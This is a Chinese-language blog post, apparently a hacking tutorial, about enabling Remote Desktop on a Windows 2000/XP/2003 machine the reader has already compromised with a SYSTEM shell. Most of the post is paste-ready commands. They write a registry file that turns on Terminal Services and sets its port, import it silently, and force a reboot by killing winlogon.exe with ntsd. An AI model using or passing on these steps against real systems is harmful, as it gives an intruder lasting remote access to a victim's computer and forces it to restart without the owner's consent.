今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,xp,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务。
一、win 2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:
echo Windows Registry
Editor Version 5.00 >>3389.reg
echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
>>3389.reg
echo "Enabled"="0"
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon]
>>3389.reg
echo
"ShutdownWithoutLogon"="0"
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo
"EnableAdminTSRemote"=dword:00000001
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]
>>3389.reg
echo
"TSEnabled"=dword:00000001
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>3389.reg
echo "Start"=dword:00000002
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
echo "Start"=dword:00000002
>>3389.reg
echo
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
>>3389.reg
echo "Hotkey"="1"
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]
>>3389.reg
echo
"PortNumber"=dword:00000D3D
>>3389.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]
>>3389.reg
echo
"PortNumber"=dword:00000D3D
>>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s
3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win
2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。
一个简单的办法就是用ntsd.exe(win
2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!
比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)
winlogon.exe被关闭后机器立刻强制重启了
命令执行格式为ntsd -c q -p
PID
本文介绍了一种在Windows 2000系统中无需上传任何文件即可开启终端服务的方法,适用于获得SYSTEM权限CMD Shell的情况。通过编写并导入注册表文件3389.reg来配置终端服务的各项参数。
扫一扫
945
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
